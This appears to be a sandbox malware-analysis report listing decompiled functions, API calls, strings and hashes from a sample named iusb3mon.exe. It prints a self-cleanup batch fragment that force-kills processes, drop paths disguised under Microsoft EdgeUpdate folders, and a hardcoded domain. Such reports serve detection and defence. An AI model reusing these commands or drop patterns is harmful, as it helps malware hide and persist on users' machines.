Associated: 0000001E.00000002.4667990029.0000000000447000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000449000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000451000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000045F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000462000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000467000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000469000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000471000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000473000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000497000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000049C000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4678100485.000000000072F000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_340000_iusb3mon.jbxd

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-1866435925
Opcode ID: b1c22d68a573e52570428a767c1f03098012f711ddf103a760b4240d428699c1
Instruction ID: 2e5a4323541f3df2c84f0bb788b558c414fee437b67430e59bfe1a382fd70ccf
Opcode Fuzzy Hash: b1c22d68a573e52570428a767c1f03098012f711ddf103a760b4240d428699c1
Instruction Fuzzy Hash: 0911D5B6910B046BC712EF98D802B96B3DCEF45310F14862AFD589F641FB70B989CB91

Function 06294E65 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56sleepfileCOMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000), ref: 06294E9D
DeleteFileA.KERNEL32(?), ref: 06294EE0
Sleep.KERNEL32(000007D0), ref: 06294F0F

Part of subcall function 06294D89: SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000), ref: 06294DBD
Part of subcall function 06294D89: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 06294E10
Part of subcall function 06294D89: GetFileSize.KERNEL32(00000000,00000000), ref: 06294E21
Part of subcall function 06294D89: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 06294E3C
Part of subcall function 06294D89: CloseHandle.KERNEL32(?), ref: 06294E59

Strings

.dat, xrefs: 06294ECB

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$FolderPathSpecial$CloseCreateDeleteHandleReadSizeSleep
String ID: .dat
API String ID: 4140139616-100240174
Opcode ID: 0e2841fda9a46189e2c46ebfd481420f52f31635e40eb86e17e4611bf40c739a
Instruction ID: decf0dcca5d18aaa6e07401acb296acfac163c102e94afe4e6d82cc37da9a6ef
Opcode Fuzzy Hash: 0e2841fda9a46189e2c46ebfd481420f52f31635e40eb86e17e4611bf40c739a
Instruction Fuzzy Hash: 4D1193B5D34345ABEFA0BB60DC48BE976999B94310F000049DEC552180D7B855818F31

Function 062A6228 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 062A622D

Part of subcall function 0629A00C: RaiseException.KERNEL32(?,00000004,?,00000004,?,?,?,00000004,?,00000004,?,00000004,00000003,00000003), ref: 0629A03A

Strings

ios::badbit set, xrefs: 062A625A
ios::eofbit set, xrefs: 062A626B, 062A627F, 062A6287
ios::failbit set, xrefs: 062A6264

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: ExceptionH_prologRaise
String ID: ios::badbit set$ios::eofbit set$ios::failbit set
API String ID: 3968804221-425934345
Opcode ID: 757d644c51f48968bfa9e0f6b78189ebb851c9911511d935aaff589a138cc596
Instruction ID: 8d54e8e3cb58bae86f8bd7217ae4f8e7ca66660a6aff3deccbcac288b2d75430
Opcode Fuzzy Hash: 757d644c51f48968bfa9e0f6b78189ebb851c9911511d935aaff589a138cc596
Instruction Fuzzy Hash: 1B1165B2C21349BBCBC0EFA4C991AEEB7689F44314F088059ED65A7641D7B85905C761

Function 0629ABCC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(06296D67,huazai168.com,0629ABA8,00000000,00000000,00000000,06296D67,00000000), ref: 0629ABE1
TerminateProcess.KERNEL32(00000000), ref: 0629ABE8
ExitProcess.KERNEL32 ref: 0629AC69

Strings

huazai168.com, xrefs: 0629ABCC

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID: huazai168.com
API String ID: 1703294689-2241639779
Opcode ID: 1ce2235ded05c1f3bef6fdb44a8b62421437ca2cf7e75c947a2efa22777ab68e
Instruction ID: cfed4798a4faca45020c64ccc835f30df4af87f3d717dd04e154bceab42ba96b
Opcode Fuzzy Hash: 1ce2235ded05c1f3bef6fdb44a8b62421437ca2cf7e75c947a2efa22777ab68e
Instruction Fuzzy Hash: DB01C4329643029FDED46F28F8C9A597BE6FBD0361B000419EE955A181CB75A481DE71

Function 06294C6F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat,?,?,06295D6A,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat), ref: 06294C85
WriteFile.KERNEL32(00000000,062B5680,00001F53,?,00000000,?,?,06295D6A,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat), ref: 06294C9D
CloseHandle.KERNEL32(00000000,?,?,06295D6A,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat), ref: 06294CAA

Strings

C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat, xrefs: 06294C75

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat
API String ID: 1065093856-3013772396
Opcode ID: a8e64ac3af4707457f1f44efe176a37d08c66e5b4762b2c1183e8b61fce3cde0
Instruction ID: 485b8c17665dc454f51d164a9c409779c9f832f7897e336c425e90fd8d26b846
Opcode Fuzzy Hash: a8e64ac3af4707457f1f44efe176a37d08c66e5b4762b2c1183e8b61fce3cde0
Instruction Fuzzy Hash: 5DE0D871241319BFFB101D61BCCAFE73B0EEB017D8F014122FF0495140C6915D018AB4

Function 062929CE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,00000000,76230F00,?,06293E44,C:\ProgramData\Microsoft\del.bat,?,?), ref: 062929E4
WriteFile.KERNEL32(00000000,@echo off 2>nul 3>nultimeout /t 5taskkill /im notepad.exe /ftaskkill /im microsoft.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill ,00000F7D,?,00000000,?,06293E44,C:\ProgramData\Microsoft\del.bat,?,?), ref: 062929FC
CloseHandle.KERNEL32(00000000,?,06293E44,C:\ProgramData\Microsoft\del.bat,?,?), ref: 06292A09

Strings

@echo off 2>nul 3>nultimeout /t 5taskkill /im notepad.exe /ftaskkill /im microsoft.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill , xrefs: 062929F6

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID: @echo off 2>nul 3>nultimeout /t 5taskkill /im notepad.exe /ftaskkill /im microsoft.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill
API String ID: 1065093856-3151026013
Opcode ID: f172099e1c5b379426761a35281e760d8766b49c3beb399ce733ab1bf86fb9d3
Instruction ID: 211e7a61bca52574f18e678883d3542f2cd9772c6eece677b1bc178555d18cd3
Opcode Fuzzy Hash: f172099e1c5b379426761a35281e760d8766b49c3beb399ce733ab1bf86fb9d3
Instruction Fuzzy Hash: 96E0DF72292319BFFA201E60BCCAFEB7B1EEB067E8F004121FF04A5540C6919D019AB0

Function 06295D5B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30processsleepCOMMON

Download Yara Rule

APIs

Part of subcall function 06294C6F: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat,?,?,06295D6A,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat), ref: 06294C85
Part of subcall function 06294C6F: WriteFile.KERNEL32(00000000,062B5680,00001F53,?,00000000,?,?,06295D6A,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat), ref: 06294C9D
Part of subcall function 06294C6F: CloseHandle.KERNEL32(00000000,?,?,06295D6A,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat), ref: 06294CAA

Part of subcall function 06291C74: SetFileAttributesA.KERNEL32(00000000,00000080,0629682E,C:\ProgramData\Microsoft\Program\ziliao.jpg,00000000), ref: 06291C88

WinExec.KERNEL32(C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat,00000000), ref: 06295D7E
Sleep.KERNEL32(000493E0), ref: 06295D8C
WinExec.KERNEL32(C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat,00000000), ref: 06295DA2

Strings

C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat, xrefs: 06295D5E, 06295D64, 06295D6C, 06295D7D, 06295D8E, 06295D96, 06295DA1

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$Exec$AttributesCloseCreateHandleSleepWrite
String ID: C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat
API String ID: 3627572907-3013772396
Opcode ID: 1fb327f7f5af286fed4117d86a3de9b90b883f9ca5f85c0a68123c9538f363a5
Instruction ID: 80485daeb4d534abb7f7aec7c14302f2dc63e73d26189991b5728a444b7b2bb1
Opcode Fuzzy Hash: 1fb327f7f5af286fed4117d86a3de9b90b883f9ca5f85c0a68123c9538f363a5
Instruction Fuzzy Hash: BBE01230522A697AE8E276216C8AFDF254D8FC2744F020020FE14362D18AC92B1689FA

Function 062AB81C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(00000000,000000F0), ref: 062AB82D
GetClassNameA.USER32(00000000,?,0000000A), ref: 062AB848
lstrcmpiA.KERNEL32(?,combobox), ref: 062AB857

Strings

combobox, xrefs: 062AB851

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: ClassLongNameWindowlstrcmpi
String ID: combobox
API String ID: 2054663530-2240613097
Opcode ID: ff93b8fa75c401c010847609cc1b2b3a5d2a409506d9db9d1c72eaa29d4ec84d
Instruction ID: 1b1ff7801663fc93a39909fbe44094e6134e549c07deef9655891c691f4afd9a
Opcode Fuzzy Hash: ff93b8fa75c401c010847609cc1b2b3a5d2a409506d9db9d1c72eaa29d4ec84d
Instruction Fuzzy Hash: A8E06D31A6430ABFCF509F74DC4EAA93B69AB00386F108560FD57E5090D7B0D256DA92

Function 0629734F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25stringnetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 062991B3: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00000000), ref: 06299216
Part of subcall function 062991B3: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 0629922E
Part of subcall function 062991B3: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 0629923E
Part of subcall function 062991B3: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 0629924E
Part of subcall function 062991B3: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 0629925B
Part of subcall function 062991B3: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 06299268
Part of subcall function 062991B3: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 062993F3

lstrlenA.KERNEL32(?,?,?,?,?,06297971,?,00000032,?,?,?,00000004), ref: 06297383
gethostname.WS2_32(?,?), ref: 06297392

Strings

Remarkbeizhu, xrefs: 0629736B
Console, xrefs: 06297370

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoadgethostnamelstrlen
String ID: Console$Remarkbeizhu
API String ID: 4010645601-3228434003
Opcode ID: 1bea52b6d4f38a4b8a10ca5d9b885c3a6d4d5574f6353338ae1bfa5506251042
Instruction ID: d452d510e7c3a121354cac8fc30ca846aa3f1801d75097f87cac300689e99ef7
Opcode Fuzzy Hash: 1bea52b6d4f38a4b8a10ca5d9b885c3a6d4d5574f6353338ae1bfa5506251042
Instruction Fuzzy Hash: 1DE04F31665311BEDA912A60AC0AFCB3A6AEFC9760F048409FF5470080D6B5A1919BAA

Function 0629C069 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,062999FE), ref: 0629C06E
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0629C07E

Strings

KERNEL32, xrefs: 0629C069
IsProcessorFeaturePresent, xrefs: 0629C078

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: f5da76b618d66effa98ddd6da1a1a3231bf361580d57dc6c6ff7039aa1ceaff9
Instruction ID: 4b9b8deb88657b50f44787177a30047d59d1dfa791d7f28ca26a7fc393e6ce4b
Opcode Fuzzy Hash: f5da76b618d66effa98ddd6da1a1a3231bf361580d57dc6c6ff7039aa1ceaff9
Instruction Fuzzy Hash: 60C002B07A53036BFFA01E715C4DF15155D5B90F42F0546146E45D5584DAD5C001A931

Function 0629AF85 Relevance: 6.5, APIs: 5, Instructions: 278COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfc87311505ac5c51179f4871dc311e65f019a3c72e9a229fc9601814d685cd0
Instruction ID: e24cdca3dcfede4e616691a970e8beddf12c5a319206f6a6d717efd022d49ed4
Opcode Fuzzy Hash: cfc87311505ac5c51179f4871dc311e65f019a3c72e9a229fc9601814d685cd0
Instruction Fuzzy Hash: 9191C471D20215AEDFA1AB68ED84A9F7AB9EFC5661F240216FC64B61C0E7314D40CBB0

Function 0629F990 Relevance: 6.4, APIs: 5, Instructions: 102memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000000,00002020,?,?,?,06298D56,0629FE5C,00000000,00000010,00000000,00000009,00000009,?,0629AD87,00000010,00000000), ref: 0629F9B1
VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,06298D56,0629FE5C,00000000,00000010,00000000,00000009,00000009,?,0629AD87,00000010,00000000), ref: 0629F9D5
VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,06298D56,0629FE5C,00000000,00000010,00000000,00000009,00000009,?,0629AD87,00000010,00000000), ref: 0629F9EF
VirtualFree.KERNEL32(00000000,00000000,00008000,?,06298D56,0629FE5C,00000000,00000010,00000000,00000009,00000009,?,0629AD87,00000010,00000000,06298D56), ref: 0629FAB0
HeapFree.KERNEL32(00000000,00000000,?,06298D56,0629FE5C,00000000,00000010,00000000,00000009,00000009,?,0629AD87,00000010,00000000,06298D56,00000000), ref: 0629FAC7

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AllocVirtual$FreeHeap
String ID:
API String ID: 714016831-0
Opcode ID: 98f976c13af4d2bdf77e2d9a6c651f0ffd9469864db2d5d72fdaa60fd845e565
Instruction ID: 33b3951a6d811136815dae4f0eae0df254a949c6aa85c93806479ff4cafff6f9
Opcode Fuzzy Hash: 98f976c13af4d2bdf77e2d9a6c651f0ffd9469864db2d5d72fdaa60fd845e565
Instruction Fuzzy Hash: E2315A71A20302DFD7B0CF14ED48B61B7E2E784750F10853AEA55D7290E7B09445CF66

Function 062A19EA Relevance: 6.2, APIs: 4, Instructions: 170fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 062A1A64
GetLastError.KERNEL32 ref: 062A1A6E
ReadFile.KERNEL32(?,?,00000001,?,00000000), ref: 062A1B34
GetLastError.KERNEL32 ref: 062A1B3E

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: 957f3c90d92e4459a55cb15444842c9c215d22bf861a4344ceda3c7de620902e
Instruction ID: 65ebb35b69e993079cf460e7e6403daced26758d8c0941b9d7d2cec60e50d012
Opcode Fuzzy Hash: 957f3c90d92e4459a55cb15444842c9c215d22bf861a4344ceda3c7de620902e
Instruction Fuzzy Hash: 78510A34A24346DFDFA18F98C8887A97BB1BF02324F148A99DCA18B395D3F09565CB51

Function 062A1626 Relevance: 6.1, APIs: 4, Instructions: 135fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,00000000,00000000,00000001,00000824,?), ref: 062A16ED

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: e0a76c13b2414817007cabd3101699d23597d62a5251f381fbbd6e93a992e4f7
Instruction ID: 844c9a23af3d258a055b8fd4a44b78dfd82aef1e4e7aa33e5df2503b0adb53f2
Opcode Fuzzy Hash: e0a76c13b2414817007cabd3101699d23597d62a5251f381fbbd6e93a992e4f7
Instruction Fuzzy Hash: CB519D31920309EFDB91CF68CC88AAD7BB5FF857A0F148595EC259F250D7B09A50DBA0

Function 062A6B0E Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(062C893C), ref: 062A6B52
InterlockedDecrement.KERNEL32(062C893C), ref: 062A6B61
InterlockedDecrement.KERNEL32(062C893C), ref: 062A6B94
InterlockedDecrement.KERNEL32(062C893C), ref: 062A6C2C

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Interlocked$Decrement$Increment
String ID:
API String ID: 2574743344-0
